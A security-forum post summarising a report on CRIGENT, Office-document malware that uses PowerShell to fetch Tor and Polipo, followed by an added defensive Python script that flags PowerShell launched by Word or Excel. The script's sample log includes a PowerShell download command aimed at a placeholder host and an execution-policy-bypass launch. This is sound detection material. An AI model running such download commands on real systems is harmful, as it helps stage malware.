
Mar 27 Word and Excel Files Infected Using Windows PowerShell

Discussion in 'Security Updates' started by snoopy, Mar 29, 2014.

  snoopy
    Malware targeting Word and Excel files has been around for some time, but we recently encountered a new malware family, CRIGENT (also known as “Power Worm”) which brings several new techniques to the table. (We detect these files as W97M_CRIGENT.A and X97M_CRIGENT.A.)

    Most significantly, instead of creating or including executable code, CRIGENT uses the Windows PowerShell to carry out its routines. PowerShell is a powerful interactive shell/scripting tool that is available for all current versions of Windows (and is built-in from Windows 7 onwards); this malware carries out all its behavior via PowerShell scripts. IT administrators that are normally on the lookout for malicious binaries may overlook this, as malware using this technique is not particularly common.

    Arrival and Additional Components

    This particular threat arrives as an infected Word or Excel document, which may be dropped by other malware or downloaded/accessed by users. When opened, right away it downloads two additional components from two well-known online anonymity projects: the Tor network, and Polipo, a personal web cache/proxy.

    More details plus screenshot here: http://blog.trendmicro.com/trendlab...reBlog+(Trendlabs+Security+Intelligence+Blog)
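A defender-side check for the behaviour the post describes, added here as an example (not code from the post or from the Trend Micro write-up): it scans constructed process-creation records (the line format, paths and command lines are assumptions) for powershell.exe children of Word or Excel and notes command lines that mention Tor, Polipo or a download cmdlet.

```python
"""Flag PowerShell spawned by Office documents, the CRIGENT pattern.
Log layout below is an assumption made for this example, not a real
Windows or Sysmon format."""
import re
from dataclasses import dataclass, field

OFFICE_PARENTS = {"winword.exe", "excel.exe"}
# Fragments worth flagging given the post: Tor/Polipo fetched by PowerShell.
SUSPECT = {"tor": r"\btor\b", "polipo": r"\bpolipo\b",
           "download cmdlet": r"downloadfile|downloadstring"}
LINE_RE = re.compile(r'^(?P<ts>\S+) ProcessCreate parent="(?P<parent>[^"]*)" '
                     r'image="(?P<image>[^"]*)" cmd="(?P<cmd>[^"]*)"$')

@dataclass
class Finding:
    timestamp: str
    parent: str
    cmd: str
    reasons: list = field(default_factory=list)

def basename(path):
    """Last path component, lower-cased, so Office14\\WINWORD.EXE matches."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess(ts, parent, image, cmd):
    """Return a Finding when powershell.exe has an Office parent, else None."""
    if basename(image) != "powershell.exe" or basename(parent) not in OFFICE_PARENTS:
        return None
    f = Finding(ts, basename(parent), cmd, [f"powershell.exe spawned by {basename(parent)}"])
    lower = cmd.lower()
    f.reasons += [f"command line matches {label}"
                  for label, pat in SUSPECT.items() if re.search(pat, lower)]
    return f

def scan(lines):
    """Parse each record and collect findings; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and (f := assess(m["ts"], m["parent"], m["image"], m["cmd"])):
            findings.append(f)
    return findings

# Constructed sample records: two Office-launched PowerShell children, one benign
# PowerShell from Explorer, and a non-PowerShell child of Word (print helper).
SAMPLE_LOG = r"""
2014-03-27T10:01:02 ProcessCreate parent="C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\alice\AppData\Local\Temp\stage.ps1"
2014-03-27T10:01:05 ProcessCreate parent="C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -NoProfile -Command (New-Object Net.WebClient).DownloadFile('http://download.invalid/tor.zip','C:\Users\alice\AppData\Local\Temp\tor.zip')"
2014-03-27T10:02:00 ProcessCreate parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe Get-ChildItem C:\Users\alice"
2014-03-27T10:02:30 ProcessCreate parent="C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" image="C:\Windows\splwow64.exe" cmd="splwow64.exe 8192"
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.timestamp, f.parent, "->", "; ".join(f.reasons))
```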
     
